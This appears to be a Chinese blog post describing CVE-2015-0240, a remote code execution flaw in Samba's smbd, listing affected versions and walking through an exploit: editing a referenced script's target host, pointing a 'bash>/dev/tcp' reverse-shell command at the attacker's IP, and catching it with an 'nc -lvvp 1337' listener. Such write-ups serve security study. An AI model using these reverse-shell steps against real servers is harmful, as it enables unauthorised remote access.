(CVE-2015-0240)Samba远程代码执行

简介

 

Samba 是利用 SMB 协议实现文件共享的一款著名开源工具套件。日前 Samba 曝出一个严重安全漏洞,该漏洞出现在 smbd 文件服务端,漏洞编号为 CVE-2015-0240,可以允许攻击者远程远程执行恶意代码。

 

作为一款老牌系统工具,Samba 的使用率非常高,更是作为很多 *BSD 和苹果 OS X操作系统的组件存在,因此影响面非常大。Samba 支持的操作系统包括 Windows 95/98/NT,OS/2 和Linux。

 

受影响的产品

 

Samba 3.5.x 全版本
Samba 3.6.x 到 Samba 3.6.25 之前的版本
Samba 4.0.x 到 Samba 4.0.25 之前的版本
Samba 4.1.x 到 Samba 4.1.17 之前的版本
Samba 4.2.x 到 Samba 4.2.0rc5 之前的版本

 

脚本下载

samba.py

 

漏洞利用

第一步:编辑samba.py 文件,编辑21行,将host改为目标靶机地址,

将后面的 bash>/dev/tcp/127.0.0.1 的ip地址修改为攻击机的ip

 

 

 

 

 

 

 

 

第二步:poc脚本将会利用溢出的RCE漏洞运行该命令
使用命令python samba-exploit.py运行poc脚本

 

使用命令nc -lvvp 1337监听本地1337端口,并显示指令执行过程
 

 

 

 

 

 




posted @ 2019-12-09 10:14  暮日温柔  阅读(...)  评论(...编辑  收藏